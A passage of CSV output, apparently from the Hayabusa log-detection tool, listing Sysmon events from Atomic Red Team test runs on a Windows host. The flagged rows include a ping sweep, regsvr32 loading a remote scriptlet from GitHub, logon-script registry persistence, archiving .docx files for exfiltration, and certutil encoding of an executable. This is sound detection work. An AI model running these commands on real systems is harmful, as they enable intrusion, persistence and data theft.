-n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser 
: Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 